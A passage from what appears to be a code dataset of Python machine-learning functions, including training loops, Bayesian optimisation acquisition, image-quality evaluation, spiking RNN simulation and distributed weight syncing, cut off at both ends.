= net.glcu(step_features)\n gate = gate.repeat(1, frame_cnt).view(frame_cnt, base_out_dim)\n assert glcu_task_pred.size(0) == 1\n glcu_task_pred = F.softmax(glcu_task_pred.squeeze(), dim=0)\n if net.additive_glcu:\n base_out = base_out + gate\n else:\n base_out = base_out * gate\n\n output = net.test_fc(base_out)\n assert output.size(0) == frame_cnt and output.size(1) == output_dim\n act_scores, comp_scores, reg_scores = reorg_stpp.forward(output, prop_ticks, prop_scaling, bp_mode=True)\n\n # Task Head\n combined_scores = F.softmax(act_scores[:, 1:], dim=1) * torch.exp(comp_scores)\n combined_scores = combined_scores.mean(dim=0).unsqueeze(0)\n task_pred = net.task_head(combined_scores)\n assert task_pred.size(0) == 1\n task_pred = F.softmax(net.task_head(combined_scores).squeeze(), dim=0)\n\n loss = KL(task_pred, glcu_task_pred)\n loss.backward()\n torch.cuda.empty_cache() # To empty the cache from previous iterations\n break\n\n optimizer.step()\n optimizer.zero_grad()\n torch.cuda.empty_cache()\n\n return float(loss.data), frame_cnt", "def syn_ucbpe(num_workers, gp, acq_optimiser, anc_data):\n # Define some internal functions.\n beta_th = _get_ucb_beta_th(gp.input_dim, anc_data.t)\n # 1. An LCB for the function\n def _ucbpe_lcb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu - beta_th * sigma\n # 2. A modified UCB for the function using hallucinated observations\n def _ucbpe_2ucb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu + 2 * beta_th * sigma\n # 3. UCB-PE acquisition for the 2nd point in the batch and so on.\n def _ucbpe_acq(x, yt_dot, halluc_pts):\n \"\"\" Acquisition for GP-UCB-PE. \"\"\"\n _, halluc_stds = gp.eval_with_hallucinated_observations(x, halluc_pts,\n uncert_form='std')\n return (_ucbpe_2ucb(x) > yt_dot).astype(np.double) * halluc_stds\n\n # Now the algorithm\n yt_dot_arg = _optimise_acquisition(_ucbpe_lcb, acq_optimiser, anc_data)\n yt_dot = _ucbpe_lcb(yt_dot_arg.reshape((-1, gp.input_dim)))\n recommendations = [asy_ucb(gp, acq_optimiser, anc_data)]\n for _ in range(1, num_workers):\n curr_acq = lambda x: _ucbpe_acq(x, yt_dot, np.array(recommendations))\n new_rec = _optimise_acquisition(curr_acq, acq_optimiser, anc_data)\n recommendations.append(new_rec)\n return recommendations", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n num_gpus=1, model='resnet50', distortions=False, forward_only=True)", "def main(args):\n gt_path = args.ground_truth\n djdd_path = args.djdd\n bjdd_path = args.bjdd\n\n mse_fn = th.nn.MSELoss()\n psnr_fn = PSNR()\n\n device = \"cpu\"\n # if th.cuda.is_available():\n # device = \"cuda\"\n\n pdf = pd.DataFrame(columns=[\"filename\",\"imgid\", \"PSNR_for_DJDD\", \"MSE_for_DJDD\", \"PSNR_for_BJDD\", \"MSE_for_BJDD\"])\n\n count = 0\n msedjdd = 0.0\n psnrdjdd = 0.0\n\n msebjdd = 0.0\n psnrbjdd = 0.0\n\n for root, _, files in os.walk(gt_path):\n for idx, name in enumerate(files):\n \n # djdd image\n output_djdd = np.array(imread(os.path.join(djdd_path, name+\"_0_output.png\"))).astype(np.float32) / (2**8-1)\n output_djdd = th.from_numpy(np.transpose(output_djdd, [2,0,1])).to(device).unsqueeze(0)\n\n #bjdd image\n output_bjdd = np.array(imread(os.path.join(bjdd_path, name.split('.')[0]+\"_sigma_0_bayer_PIPNet.png\"))).astype(np.float32) / (2**8-1)\n output_bjdd = th.from_numpy(np.transpose(output_bjdd, [2,0,1])).to(device).unsqueeze(0)\n\n # gt image\n target = np.array(imread(os.path.join(root, name))).astype(np.float32) / (2**8-1)\n target = th.from_numpy(np.transpose(target, [2, 0, 1])).to(device).unsqueeze(0)\n\n\n target_djdd = crop_like(target, output_djdd)\n target_bjdd = crop_like(target, output_bjdd)\n\n psnr_djdd = psnr_fn(output_djdd, target_djdd).item()\n mse_djdd = mse_fn(output_djdd, target_djdd).item()\n\n psnr_bjdd = psnr_fn(output_bjdd, target_bjdd).item()\n mse_bjdd = mse_fn(output_bjdd, target_bjdd).item()\n\n psnrdjdd += psnr_djdd\n msedjdd += mse_djdd\n psnrbjdd += psnr_bjdd\n msebjdd += mse_bjdd\n\n count += 1\n\n LOG.info(f\"imgid: {idx}, PSNR_BJDD: {psnr_bjdd}, MSE_BJDD: {mse_bjdd}, PSNR_DJDD: {psnr_djdd}, MSE_DJDD: {mse_djdd}\")\n pdf = pdf.append({\n \"filename\": name,\n \"imgid\": idx,\n \"PSNR_for_DJDD\": psnr_djdd,\n \"MSE_for_DJDD\": mse_djdd,\n \"PSNR_for_BJDD\": psnr_bjdd,\n \"MSE_for_BJDD\": mse_bjdd\n }, ignore_index=True)\n # pdb.set_trace()\n\n msebjdd /= count\n psnrbjdd /= count\n\n msedjdd /= count\n psnrdjdd /= count\n\n LOG.info(\"--------------BJDD---------------------\")\n LOG.info(\"Average, PSNR = %.1f dB, MSE = %.5f\", psnrbjdd, msebjdd)\n\n LOG.info(\"--------------DJDD---------------------\")\n LOG.info(\"Average, PSNR = %.1f dB, MSE = %.5f\", psnrdjdd, msedjdd)\n pdb.set_trace()\n pdf.to_csv(\"/workspace/presentation_compare.csv\")", "def update_network(self):\n\n device = torch.device(\"cpu\")\n self.model = ProLoNet(input_dim=13,\n weights=None,\n comparators=None,\n leaves=32,\n output_dim=1,\n bayesian_embedding_dim=8,\n alpha=1.5,\n use_gpu=False,\n vectorized=True,\n is_value=True).to(device)\n\n self.embedding_optimizer = torch.optim.RMSprop([{'params': self.model.bayesian_embedding.parameters()}], lr=.1)\n self.embedding_list = [torch.ones(3) * 1 / 3 for i in range(2000)]\n self.opt = torch.optim.RMSprop(\n [{'params': list(self.model.parameters())[:-1]}, {'params': self.model.bayesian_embedding.parameters(), 'lr': .01}], lr=.01)\n\n criterion = torch.nn.BCELoss()\n\n n_epochs = 4000 + self.global_schedule_num * 3\n for epoch in range(n_epochs):\n which_schedule = np.random.randint(len(self.data_so_far))\n timestep_within_schedule = np.random.randint(len(self.teacher_actions[which_schedule]))\n\n index_within_network_state = timestep_within_schedule * 20\n timestep_data_from_agg = self.data_so_far[which_schedule][index_within_network_state:index_within_network_state+20]\n task = self.teacher_actions[which_schedule][timestep_within_schedule]\n # set the embedding\n self.model.set_bayesian_embedding(self.embedding_list[which_schedule].clone())\n # update loop\n\n phi_i_num = task\n phi_i = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, phi_i_num)\n phi_i_numpy = np.asarray(phi_i)\n loss_counter = 0\n # iterate over pairwise comparisons\n for counter in range(0, 0 + 20):\n if counter == phi_i_num:\n continue\n else:\n phi_j = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, counter)\n phi_j_numpy = np.asarray(phi_j)\n feature_input = phi_i_numpy - phi_j_numpy\n\n if self.use_gpu:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)).cuda())\n label = Variable(torch.Tensor(torch.ones((1, 1))).cuda())\n else:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)))\n label = Variable(torch.Tensor(torch.ones((1, 1))))\n sig = torch.nn.Sigmoid()\n output = sig(self.model(feature_input))\n loss = criterion(output, label)\n # prepare optimizer, compute gradient, update params\n loss_counter += loss.item()\n self.opt.zero_grad()\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), 0.5)\n self.opt.step()\n\n for counter in range(0, 0 + 20):\n if counter == phi_i_num:\n continue\n else:\n phi_j = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, counter)\n phi_j_numpy = np.asarray(phi_j)\n feature_input = phi_j_numpy - phi_i_numpy\n\n if self.use_gpu:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)).cuda())\n label = Variable(torch.Tensor(torch.zeros((1, 1))).cuda())\n else:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)))\n label = Variable(torch.Tensor(torch.zeros((1, 1))))\n sig = torch.nn.Sigmoid()\n output = sig(self.model.forward(feature_input))\n\n self.opt.zero_grad()\n loss = criterion(output, label)\n loss_counter += loss.item()\n\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), 0.5)\n self.opt.step()\n self.loss_array.append(loss_counter / 38)\n self.embedding_list[which_schedule] = torch.Tensor(self.model.get_bayesian_embedding().detach().cpu().numpy()).clone() # very ugly", "def rnn_cell_loop(self):\n\n\t\t# Set up initial state\n\t\tself.h_out = [tf.zeros([par['batch_size'],par['n_hidden']])]\t\t\t# Spike\n\t\tself.h = tf.ones([par['batch_size'],par['n_hidden']])\t\t\t\t\t# State\n\t\tself.h *= 0.1 if par['cell_type'] == 'rate' else par[par['cell_type']]['V_r']\n\t\tself.h = [self.h]\n\t\tadapt = par['w_init']*tf.ones([par['batch_size'],par['n_hidden']])\n\n\t\tsyn_x = par['syn_x_init']*tf.ones([par['batch_size'], par['n_hidden']]) if par['use_stp'] else None\n\t\tsyn_u = par['syn_u_init']*tf.ones([par['batch_size'], par['n_hidden']]) if par['use_stp'] else None\n\n\t\t# Apply the EI mask to the recurrent weights\n\t\tself.W_rnn_effective = par['EI_matrix'] @ tf.nn.relu(self.var_dict['W_rnn'])\n\n\t\t# Set up latency buffer if being used\n\t\tif par['use_latency']:\n\t\t\tself.state_buffer = [tf.zeros([par['batch_size'], par['n_hidden']]) for t in range(par['latency_max'])]\n\t\t\tself.state_buffer = deque(self.state_buffer)\n\t\t\tself.W_rnn_latency = self.W_rnn_effective[tf.newaxis,...] * par['latency_mask']\n\t\t\tself.lat_spike_shape = tf.ones([par['latency_max'], 1, 1])\n\n\t\t# Set up output record\n\t\tself.output = []\n\t\tself.syn_x = []\n\t\tself.syn_u = []\n\n\t\ty = 0.\n\t\tfor t in range(par['num_time_steps']):\n\t\t\tself.t = t \t\t# For latency calculations\n\n\t\t\tif par['cell_type'] == 'rate':\n\t\t\t\traise Exception('Rate cell not yet implemented.')\n\t\t\telif par['cell_type'] == 'adex':\n\t\t\t\tif t < 10:\n\t\t\t\t\tspike, state, adapt, syn_x, syn_u = self.AdEx_cell(tf.zeros_like(self.h_out[-1]), self.h[-1], \\\n\t\t\t\t\t\tadapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\telse:\n\t\t\t\t\tspike, state, adapt, syn_x, syn_u = self.AdEx_cell(self.h_out[-10], self.h[-1], \\\n\t\t\t\t\t\tadapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\ty = 0.95*y + 0.05*(spike @ self.var_dict['W_out'] + self.var_dict['b_out'])\n\n\t\t\t\tself.h_out.append(spike)\n\t\t\t\tself.h.append(state)\n\t\t\t\tself.output.append(y)\n\t\t\t\tself.syn_x.append(syn_x)\n\t\t\t\tself.syn_u.append(syn_u)\n\n\t\t\telif par['cell_type'] == 'lif':\n\t\t\t\tspike, state, adapt, syn_x, syn_u = self.LIF_cell(self.h_out[-1], self.h[-1], adapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\ty = 0.95*y + 0.05*spike @ self.var_dict['W_out'] + 0.*self.var_dict['b_out']\n\n\t\t\t\tself.h_out.append(spike)\n\t\t\t\tself.h.append(state)\n\t\t\t\tself.output.append(y)\n\n\t\t# Stack records\n\t\tself.output = tf.stack(self.output, axis=0)\n\t\tself.h = tf.stack(self.h, axis=0)\n\t\tself.h_out = tf.stack(self.h_out, axis=0)\n\t\tself.syn_x = tf.stack(self.syn_x, axis=0)\n\t\tself.syn_u = tf.stack(self.syn_u, axis=0)", "def compute_status(self, net_output, gts):\n # setting prob_list and probs as None\n self.probs = None\n self.prob_list = None\n\n logit_list = net_output[0]\n self.compute_top1_accuracy(logit_list, gts)\n self.compute_oracle_accuracy(logit_list, gts)\n self.compute_confusion_matrix(logit_list, gts)\n\n self.attach_predictions()\n self.attach_assignments(gts)", "def process(self, sess):\n global send_counter\n \n #sess.run(self.sync) # copy weights from shared to local\n rollout = self.pull_batch_from_queue()\n batch = process_rollout(rollout, gamma=0.99, lambda_=1.0)\n\n should_compute_summary = self.task == 0 and self.local_steps % 11 == 0\n\n if should_compute_summary:\n fetches = [self.summary_op, self.train_op]\n else:\n fetches = [self.train_op]\n\n\n feed_dict = {\n self.local_network.x: batch.si,\n self.ac: batch.a,\n self.adv: batch.adv,\n self.r: batch.r,\n self.local_network.state_in[0]: batch.features[0],\n self.local_network.state_in[1]: batch.features[1],\n }\n\n # Get current trainable variables\n # This is trainable variables\n fetched = sess.run(fetches, feed_dict=feed_dict)\n\n\n if self.num_workers > 1:\n sys.stdout.write('\\r' + str(self.local_steps))\n if self.local_steps % 100 == 0:\n global var0\n global var1\n var1 = sess.run(self.local_network.var_list) # After training\n if var0 != None:\n var_diff = [a - b for (a,b) in zip(var1, var0)]\n var_diff_data = pickle.dumps(var_diff, -1)\n print('Sync weights')\n self.msg_sent = socket_util.socket_send_data_chucks(self.sock, var_diff_data, self.mcast_destination, self.msg_sent)\n var0 = sess.run(self.local_network.var_list) # A list of numpy array\n\n # Handle each message in the socket queue\n while not self.inc_msg_q.empty():\n print('Apply remote gradients')\n # Process received grads_and_vars from other peers\n remote_var_diff_data = self.inc_msg_q.get(False)\n remote_var_diff = pickle.loads(remote_var_diff_data)\n\n add_op = [a+b for (a,b) in zip(self.local_network.var_list, remote_var_diff)]\n sess.run(add_op)\n\n if should_compute_summary:\n self.summary_writer.add_summary(tf.Summary.FromString(fetched[0]))\n self.summary_writer.flush()\n self.local_steps += 1", "def __call__(self, initial_state, previous_alignments):\n with tf.variable_scope(None, \"rnn_score_attention\", [initial_state]):\n score, final_state = rnn_score(initial_state, self._keys, self._cell, self._memory_sequence_length)\n alignments = self._probability_fn(score, previous_alignments)\n return alignments, final_state", "def main(Args):\n norm = [1.9844158727667542, 413.83759806375525,\n 51.2789974336363, 1038.4760551905683]\n input_pull = False\n input_model_mapping = False\n max_number = 2\n count = 40000\n catalog_name = os.path.join(DATA_PATH, 'OneDegSq.fits')\n # Define parameters for mrcnn model with btk here\n resid_model = btk_utils.Resid_btk_model(\n Args.model_name, Args.model_path, MODEL_DIR, training=True,\n images_per_gpu=4, validation_for_training=True)\n # Load parameters for dataset and load model\n resid_model.config.WEIGHT_DECAY = 0.001\n resid_model.config.STEPS_PER_EPOCH = 1000\n resid_model.config.VALIDATION_STEPS = 20\n sampling_function = None\n layers = 'all'\n if Args.model_name == 'model1':\n resid_model.config.BACKBONE = 'resnet41'\n elif Args.model_name == 'model2':\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model3':\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model4':\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model5':\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet35'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model4_large':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = '4+' # '3+'\n elif Args.model_name == 'model6':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 51.2789974336363, 1038.4760551905683]\n input_pull = True\n elif Args.model_name == 'model7':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model8': # stretch = 0.1, Q = 3\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model9': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again3': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model11': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model11_2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model12': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 6\n elif Args.model_name == 'model12_again': # stretch = 2000, Q = 0.5 # larger learning rate\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 10 # changed from 6 to 10 for run 4\n elif Args.model_name == 'model12_again2': # stretch = 2000, Q = 0.5 # larger learning rate val set reduced to 10\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 6\n resid_model.config.VALIDATION_STEPS = 10\n else:\n raise AttributeError(\"model not found\", Args.model_name)\n print(\"Train in model:\", Args.model_name)\n resid_model.config.display()\n resid_model.make_resid_model(catalog_name, count=count,\n max_number=max_number, augmentation=True,\n norm_val=norm, input_pull=input_pull,\n sampling_function=sampling_function,\n input_model_mapping=input_model_mapping)\n learning_rate = resid_model.config.LEARNING_RATE/10.\n np.random.seed(Args.epochs)\n history = resid_model.model.train(resid_model.dataset,\n resid_model.dataset_val,\n learning_rate=learning_rate,\n epochs=Args.epochs,\n layers=layers)\n name = Args.model_name + '_run2'\n with open(name + \".dill\", 'wb') as handle:\n dill.dump(history.history, handle)\n learning_rate = resid_model.config.LEARNING_RATE/10.\n np.random.seed(Args.epochs + 10)\n history = resid_model.model.train(resid_model.dataset,\n resid_model.dataset_val,\n learning_rate=learning_rate,\n epochs=Args.epochs+10,\n layers=layers)\n name = Args.model_name + '_run3'\n with open(name + \".dill\", 'wb') as handle:\n dill.dump(history.history, handle)", "def worker(self, gpu_id: int):\n if self.seed is not None:\n make_deterministic(self.seed)\n self.current_rank = self.rank\n if self.distributed:\n if self.multiprocessing:\n # For multiprocessing distributed training, rank needs to be the\n # global rank among all the processes\n self.current_rank = self.rank * self.ngpus_per_node + gpu_id\n dist.init_process_group(\n backend=self.dist_backend,\n init_method=self.dist_url,\n world_size=self.world_size,\n rank=self.current_rank\n )\n # set up process logger\n self.logger = logging.getLogger(\"worker_rank_{}\".format(self.current_rank))\n self.logger.propagate = False\n handler = QueueHandler(self.logger_queue)\n self.logger.addHandler(handler)\n self.logger.setLevel(logging.INFO)\n\n # only write in master process\n if self.current_rank == 0:\n self.tb_writer = self.tb_writer_constructor()\n\n self.logger.info(\n \"Use GPU: %d for training, current rank: %d\",\n gpu_id,\n self.current_rank\n )\n # get dataset\n train_dataset = get_dataset(\n self.global_cfg[\"dataset\"][\"name\"],\n self.global_cfg[\"dataset\"][\"root\"],\n split=\"train\"\n )\n val_dataset = get_dataset(\n self.global_cfg[\"dataset\"][\"name\"],\n self.global_cfg[\"dataset\"][\"root\"],\n split=\"val\"\n )\n # create model\n self.model = get_model(\n model_name=self.global_cfg[\"model\"][\"name\"],\n num_classes=self.global_cfg[\"dataset\"][\"n_classes\"]\n )\n\n self.device = torch.device(\"cuda:{}\".format(gpu_id))\n self.model.to(self.device)\n\n batch_size = self.global_cfg[\"training\"][\"batch_size\"]\n n_workers = self.global_cfg[\"training\"][\"num_workers\"]\n if self.distributed:\n batch_size = int(batch_size / self.ngpus_per_node)\n n_workers = int((n_workers + self.ngpus_per_node - 1) / self.ngpus_per_node)\n if self.global_cfg[\"training\"][\"sync_bn\"]:\n self.model = SyncBatchNorm.convert_sync_batchnorm(self.model)\n self.model = DistributedDataParallel(self.model, device_ids=[gpu_id])\n self.logger.info(\"batch_size: {}, workers: {}\".format(batch_size, n_workers))\n\n # define loss function (criterion) and optimizer\n self.loss_fn = CrossEntropyLoss().to(self.device)\n\n optimizer_cls = get_optimizer(self.global_cfg[\"training\"][\"optimizer\"])\n optimizer_params = copy.deepcopy(self.global_cfg[\"training\"][\"optimizer\"])\n optimizer_params.pop(\"name\")\n self.optimizer: Optimizer = optimizer_cls(self.model.parameters(), **optimizer_params)\n self.logger.info(\"Loaded optimizer:\\n%s\", self.optimizer)\n\n # scheduler\n self.scheduler = get_scheduler(self.optimizer, self.global_cfg[\"training\"][\"lr_schedule\"])\n\n if self.distributed:\n train_sampler = DistributedSampler(\n train_dataset,\n shuffle=True,\n drop_last=True\n )\n val_sampler = DistributedSampler(\n val_dataset,\n shuffle=False\n )\n else:\n train_sampler = RandomSampler(train_dataset)\n val_sampler = SequentialSampler(val_dataset)\n\n train_loader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n num_workers=n_workers,\n pin_memory=True,\n sampler=train_sampler\n )\n\n self.val_loader = DataLoader(\n val_dataset,\n batch_size=batch_size,\n num_workers=n_workers,\n pin_memory=True,\n sampler=val_sampler\n )\n self.logger.info(\n \"Load dataset done\\nTraining: %d imgs, %d batchs\\nEval: %d imgs, %d batchs\",\n len(train_dataset),\n len(train_loader),\n len(val_dataset),\n len(self.val_loader)\n )\n iter_generator = make_iter_dataloader(train_loader)\n\n while self.iter < self.global_cfg[\"training\"][\"train_iters\"]:\n img, label = next(iter_generator)\n self.train_iter(img, label)\n\n def is_val():\n p1 = self.iter != 0\n p2 = (self.iter + 1) % self.global_cfg[\"training\"][\"val_interval\"] == 0\n p3 = self.iter == self.global_cfg[\"training\"][\"train_iters\"] - 1\n return (p1 and p2) or p3\n\n # have a validation\n if is_val():\n self.validate()\n # end one iteration\n self.iter += 1", "def update(self, batch):\n if self.opt['cuda']:\n inputs = [Variable(torch.LongTensor(b).cuda()) for b in batch[:3]]\n subj_start_binary = Variable(torch.LongTensor(batch[5]).cuda()).float()\n subj_end_binary = Variable(torch.LongTensor(batch[6]).cuda()).float()\n obj_start_relation = Variable(torch.LongTensor(batch[7]).cuda())\n obj_end_relation = Variable(torch.LongTensor(batch[8]).cuda())\n subj_start_type = Variable(torch.LongTensor(batch[9]).cuda())\n subj_end_type = Variable(torch.LongTensor(batch[10]).cuda())\n obj_start_type = Variable(torch.LongTensor(batch[11]).cuda())\n obj_end_type = Variable(torch.LongTensor(batch[12]).cuda())\n nearest_subj_start_position_for_each_token = Variable(torch.LongTensor(batch[13]).cuda())\n distance_to_nearest_subj_start = Variable(torch.LongTensor(batch[14]).cuda())\n distance_to_subj = Variable(torch.LongTensor(batch[15]).cuda())\n nearest_obj_start_position_for_each_token = Variable(torch.LongTensor(batch[3]).cuda())\n distance_to_nearest_obj_start = Variable(torch.LongTensor(batch[4]).cuda())\n else:\n inputs = [Variable(torch.LongTensor(b)) for b in batch[:4]]\n subj_start_label = Variable(torch.LongTensor(batch[4])).float()\n subj_end_label = Variable(torch.LongTensor(batch[5])).float()\n obj_start_label = Variable(torch.LongTensor(batch[6]))\n obj_end_label = Variable(torch.LongTensor(batch[7]))\n subj_type_start_label = Variable(torch.LongTensor(batch[8]))\n subj_type_end_label = Variable(torch.LongTensor(batch[9]))\n obj_type_start_label = Variable(torch.LongTensor(batch[10]))\n obj_type_end_label = Variable(torch.LongTensor(batch[11]))\n subj_nearest_start_for_each = Variable(torch.LongTensor(batch[12]))\n subj_distance_to_start = Variable(torch.LongTensor(batch[13]))\n \n \n mask = (inputs[0].data>0).float()\n # step forward\n self.model.train()\n self.optimizer.zero_grad()\n\n \n subj_start_logits, subj_end_logits, obj_start_logits, obj_end_logits = self.model(inputs, distance_to_subj)\n\n subj_start_loss = self.obj_criterion(subj_start_logits.view(-1, self.opt['num_subj_type']+1), subj_start_type.view(-1).squeeze()).view_as(mask)\n subj_start_loss = 